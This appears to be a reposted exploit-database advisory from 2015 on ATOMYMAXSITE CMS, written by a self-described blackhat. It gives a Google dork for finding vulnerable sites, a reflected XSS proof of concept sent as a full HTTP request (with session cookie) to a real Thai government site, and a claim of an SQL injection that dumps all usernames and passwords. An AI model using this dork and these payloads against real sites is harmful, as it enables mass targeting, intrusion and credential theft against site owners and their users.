facebook facebook twitter rss

ATOMYMAXSITE CMS Multiple Vulnerability

Author: Xodiak , Published: 10-05-2015
# Exploit Title: ATOMYMAXSITE CMS Multiple Vulnerability
# Google Dork: intext:"Powered By ATOMYMAXSITE" inurl:"index.php?name=gallery"
# Date: 5/05/2015
# Exploit Author: Xodiak xodiak.blackhat@gmail.com
# Vendor Homepage:N/A
# Software Link: N/A
# Version: All Version
# Tested on: Kali Linux
# CVE : N/A

ATOMYMAXSITE CMS Is Used By Government Sites And This Vulnerabilities Can Harm All Informations And Attacked By Hackers.

Cross Site Scripting (Refelected)

An XSS Vulnerability In Search Bar And Can Used For Dangerous Ways :



GET /main/index.php?name=search&keyword=%3Cscript%3Ealert(%27Xss%27)%3C%2Fscript%3E HTTP/1.1
Host: www.pck1.go.th
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: __atuvc=2%7C18; PHPSESSID=qo9g1jdmq1ptvekvh0k008of95
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 05 May 2015 10:35:21 GMT
Server: Apache/2.2.22 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 10728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=tis-620

Sql Injection

In Gallery Section We Have A Sql Injection Vulnerability Can Inject All Databases

And Collect All Usernames And Passwords .



I Hope Develepor Patch Vulnerabilities I Found 144,000 Result For Result Dork
Tnx Very Much

Greetz :
=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza Attacker,MMA Defacer,END3R
Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=

Like us on Facebook :